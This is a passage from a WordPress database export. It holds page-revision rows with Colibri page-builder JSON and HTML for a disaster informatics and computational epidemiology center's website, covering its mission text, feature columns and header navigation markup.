style-local-122-c39-outer\">\n            <div data-colibri-id=\"122-c39\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c39 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c40\" class=\"h-text h-text-component style-319 style-local-122-c40 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The center’s mission is to consolidate expertise from multiple disciplines to identify determinants that impede regions’ resilience to natural or human-made disasters or indicate the existence of access disparities to mitigation resources\n                      or health services</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-02-16 18:14:58','2022-02-16 18:14:58','',122,'https://gsudice.dataconn.net/?p=368',0,'revision','',0),(374,1,'2022-02-16 18:19:53','2022-02-16 18:19:53','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Computational modeling &amp; spatially explicit Approaches to better understand how diseases and disasters affect places at local, regional, national, and global scales<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Data reconciliation, consolidation, and distribution to support research in disaster informatics, disease modeling, and spatial epidemiology<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 18:19:53','2022-02-16 18:19:53','',168,'https://gsudice.dataconn.net/?p=374',0,'revision','',0),(375,1,'2022-02-16 18:19:53','2022-02-16 18:19:53','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c6\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Computational modeling &amp; spatially explicit Approaches to better understand how diseases and disasters affect places at local, regional, national, and global scales</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n          <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c10\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Data reconciliation, consolidation, and distribution to support research in disaster informatics, disease modeling, and spatial epidemiology</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n        <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c14\">\n                <!---->\n                <!---->\n                <h5 class=\"\">population disparities</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 18:19:53','2022-02-16 18:19:53','',20,'https://gsudice.dataconn.net/?p=375',0,'revision','',0),(376,1,'2022-02-16 18:19:53','2022-02-16 18:19:53','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 18:19:53','2022-02-16 18:19:53','',23,'https://gsudice.dataconn.net/?p=376',0,'revision','',0),(377,1,'2022-02-16 18:19:53','2022-02-16 18:19:53','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                 